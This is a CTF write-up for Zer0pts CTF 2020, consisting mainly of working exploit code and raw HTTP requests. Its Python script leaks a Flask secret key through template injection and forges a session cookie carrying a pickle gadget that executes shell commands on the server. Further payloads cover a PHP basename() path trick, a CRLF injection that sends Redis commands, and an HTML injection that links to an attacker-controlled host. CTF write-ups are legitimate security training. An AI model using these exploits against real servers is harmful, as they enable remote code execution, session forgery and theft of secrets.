
Zer0pts CTF 2020 Writeup

JeonYoungSin 2020. 3. 8. 22:39
NorePad

exploit.py

#-*- coding: utf-8 -*-

import __builtin__
import ast
import base64
import pickle
import re
import sys
from hashlib import sha1

import requests
from flask.sessions import session_json_serializer
from itsdangerous import URLSafeTimedSerializer


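def getKey(base_url="http://3.112.201.75:8001"):
    """Leak Flask's SECRET_KEY through template injection in the Referer header.

    The target reflects the Referer header into a server-side Jinja template
    (SSTI), so sending ``{{config}}`` makes the response contain the rendered
    Flask config dict, SECRET_KEY included.  The key is printed *and* returned
    as raw bytes so the caller can feed it straight to ``getFlag`` instead of
    copy/pasting the ``b'...'`` repr by hand.

    Args:
        base_url: scheme://host:port of the target, without a trailing slash.

    Returns:
        The secret key as bytes (``str`` on Python 2), or ``None`` when the
        response contains no ``b'...'`` literal (e.g. the SSTI did not fire or
        the key is not a bytes object on that server).
    """
    url = base_url + "/gg"
    headers = {"Referer": base_url + "/{{config}}"}
    body = requests.get(url, headers=headers).text

    # Capture the inside of the first b'...' literal in the config dump.  The
    # escape-aware alternation steps over "\'" and "\\" pairs, so a key whose
    # repr contains a comma or an escaped quote is not truncated (the old
    # pattern stopped at the first comma).
    match = re.search(r"b'((?:\\.|[^'\\])*)'", body)
    if match is None:
        print("[-] No b'...' literal in the response; SSTI probably failed")
        return None

    # Turn the printed repr back into real key bytes.  literal_eval only
    # evaluates literals, so it is safe even though the text came off the wire.
    key = ast.literal_eval("b'" + match.group(1) + "'")
    print("Secret_key = " + repr(key))
    return key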


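def getFlag(key, base_url="http://3.112.201.75:8001", cmd="cat flag"):
    """Forge a Flask session carrying a pickle RCE gadget and read the flag.

    Flask sessions are only *signed* (itsdangerous HMAC-SHA1 over the JSON
    payload), never encrypted, so anyone holding SECRET_KEY can mint a cookie
    the server trusts.  The target evidently unpickles the ``savedata`` entry
    of the session (the exploit relies on it), so a ``__reduce__`` gadget runs
    ``eval`` with ``cmd`` server-side when the cookie is loaded.  This is
    deliberate insecure-deserialization exploitation of a CTF box; never
    unpickle data from an untrusted source in real code.

    Args:
        key:      the Flask SECRET_KEY (bytes, as returned by ``getKey``).
        base_url: scheme://host:port of the target, without a trailing slash.
        cmd:      shell command whose stdout ends up in the note's ``title``;
                  defaults to reading the flag file.

    Returns:
        The flag string, or ``None`` when the response holds no
        ``zer0pts{...}`` match.  Exits with status 1 when ``key`` is empty.
    """
    if not key:
        print("No Input Key")
        sys.exit(1)

    # Mirrors Flask's own session interface settings (salt, HMAC key
    # derivation, SHA-1 digest, tagged-JSON serializer) so the signature we
    # produce is exactly what the server verifies.
    signer = URLSafeTimedSerializer(
        key,
        salt="cookie-session",
        serializer=session_json_serializer,
        signer_kwargs={"key_derivation": "hmac", "digest_method": sha1},
    )

    class Exploit(object):
        """Pickle gadget: unpickling evaluates os.popen(cmd).read()."""

        def __reduce__(self):
            # %r renders cmd as a quoted Python literal inside the eval'd code.
            code = "__import__('os').popen(%r).read()" % cmd
            # The class itself is never referenced in the pickle, only the
            # (callable, args) pair; pickle records the builtin eval by module
            # name, which protocol 0 writes as __builtin__ on both Python 2
            # and 3 (fix_imports), so the payload loads on either server side.
            return (eval, (code,))

    note = [{"date": "123", "text": "555", "title": Exploit()}]
    # Pin protocol 0 (Python 2's default) so the wire format does not depend
    # on the attacker's interpreter.  base64 keeps the pickle JSON-safe, and
    # decoding to text stops Python 3 from emitting a tagged-bytes entry, so
    # the session JSON is identical to what Python 2 produced.
    saved = base64.b64encode(pickle.dumps(note, protocol=0)).decode("ascii")

    cookie = signer.dumps({"savedata": saved})
    # "Signed", not "encrypted": the payload is readable by anyone, only the
    # HMAC needs the key.
    print("[*] Signed session cookie = " + cookie)

    page = requests.get(base_url + "/", cookies={"session": cookie}).text
    # Non-greedy flag match: the old "zer0pts.*}" ran to the last "}" on the
    # page and could swallow trailing markup.
    match = re.search(r"zer0pts\{[^}]*\}", page)
    if match is None:
        print("[-] No flag in the response (did the payload run?)")
        return None
    flag = match.group(0)
    print("[*]Flag = " + flag)
    return flag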


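if __name__ == "__main__":
    # Prefer a key leaked live via the SSTI; fall back to the key captured when
    # this writeup was made (only valid while that instance keeps the same key).
    session_key = getKey() or b'\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I'
    getFlag(session_key)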


Can You Guess It?


Payload = http://3.112.201.75:8003/index.php/config.php/%81?source=1 — presumably a PHP `basename()` trick: the trailing `%81` is an invalid byte that `basename()` silently drops, so the file the script chooses to show resolves to `config.php`, while the same trailing byte keeps the raw path from matching whatever check would otherwise refuse `config.php`.


URL Scan


Payload (CRLF injection: each `%0d%0a` terminates the current line of the backend command stream, so the `rename` and `setrange` that follow are executed as separate commands — presumably Redis, where these are native commands — instead of staying part of the scanned URL. `rename flag 1234567890aabbce` moves the flag under a key of our choosing, which step 2 then reads back via `?p=`.)


1) Flag Setting

POST / HTTP/1.1

Host: 18.179.178.246:8004

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 143


url=url=abcd%0d%0arename%20flag%201234567890aabbce%0d%0asetrange%201234567890aabbce%207%20'_'%20%0d%0asetrange%201234567890aabbce%2035%20'_'%20


2) Get Flag

http://18.179.178.246:8004/?p=1234567890aabbce



MusicBlog


Payload (stored HTML injection through the post body: the `">` inside the `[[...]]` embed syntax closes the tag the server presumably builds from it, and browsers parse `<a/udio ...>` as an `<a>` element, which looks intended to slip past a filter expecting an `audio` tag; the result is an `<a href="http://my_ip" id="like">` on the page — replace `my_ip` with a host you control to receive the resulting request.)

POST /new_post.php HTTP/1.1

Host: 18.179.178.246:8005

Content-Length: 123

Cache-Control: max-age=0

Origin: http://18.179.178.246:8005

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://18.179.178.246:8005/new_post.php

Accept-Encoding: gzip, deflate

Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: PHPSESSID=5b54a2f98b67bde15fdfadf26f4c256d

Connection: close


title=bbsss&content=[["><a/udio href="http://my_ip" id="like">]]